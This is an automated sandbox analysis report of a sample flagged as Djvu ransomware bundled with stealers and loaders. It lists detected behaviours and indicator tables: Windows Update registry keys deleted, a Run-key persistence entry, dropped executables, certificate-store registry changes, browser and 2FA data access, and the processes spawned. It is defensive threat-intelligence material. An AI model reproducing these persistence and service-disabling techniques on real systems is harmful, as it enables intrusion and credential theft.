Analysis Overview
SHA256
f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6
Threat Level: Known bad
The file f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6 was found to be: Known bad.
Malicious Activity Summary
Vidar
Djvu Ransomware
Modifies security service
Detected Djvu ransomware
SmokeLoader
Amadey
Raccoon
Lumma Stealer
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Downloads MZ/PE file
Stops running service(s)
Deletes itself
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
VMProtect packed file
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Creates scheduled task(s)
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Uses Task Scheduler COM API
Analysis: static1
Detonation Overview
Reported
2023-04-25 14:32
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-25 14:32
Reported
2023-04-25 14:35
Platform
win10-20230220-en
Max time kernel
150s
Max time network
153s
Signatures
Amadey
Detected Djvu ransomware
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Raccoon
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
VMProtect packed file
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a5948247-5087-4f02-b4b2-8e34b6a1d297\\2B4C.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\2B4C.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Notepad\Chrome\updater.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\54B2.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\D415.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe
"C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe"
C:\Users\Admin\AppData\Local\Temp\918.exe
C:\Users\Admin\AppData\Local\Temp\918.exe
C:\Users\Admin\AppData\Local\Temp\A71.exe
C:\Users\Admin\AppData\Local\Temp\A71.exe
C:\Users\Admin\AppData\Local\Temp\B9B.exe
C:\Users\Admin\AppData\Local\Temp\B9B.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\11B6.exe
C:\Users\Admin\AppData\Local\Temp\11B6.exe
C:\Users\Admin\AppData\Local\Temp\26F5.exe
C:\Users\Admin\AppData\Local\Temp\26F5.exe
C:\Users\Admin\AppData\Local\Temp\2967.exe
C:\Users\Admin\AppData\Local\Temp\2967.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\3494.exe
C:\Users\Admin\AppData\Local\Temp\3494.exe
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 716
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
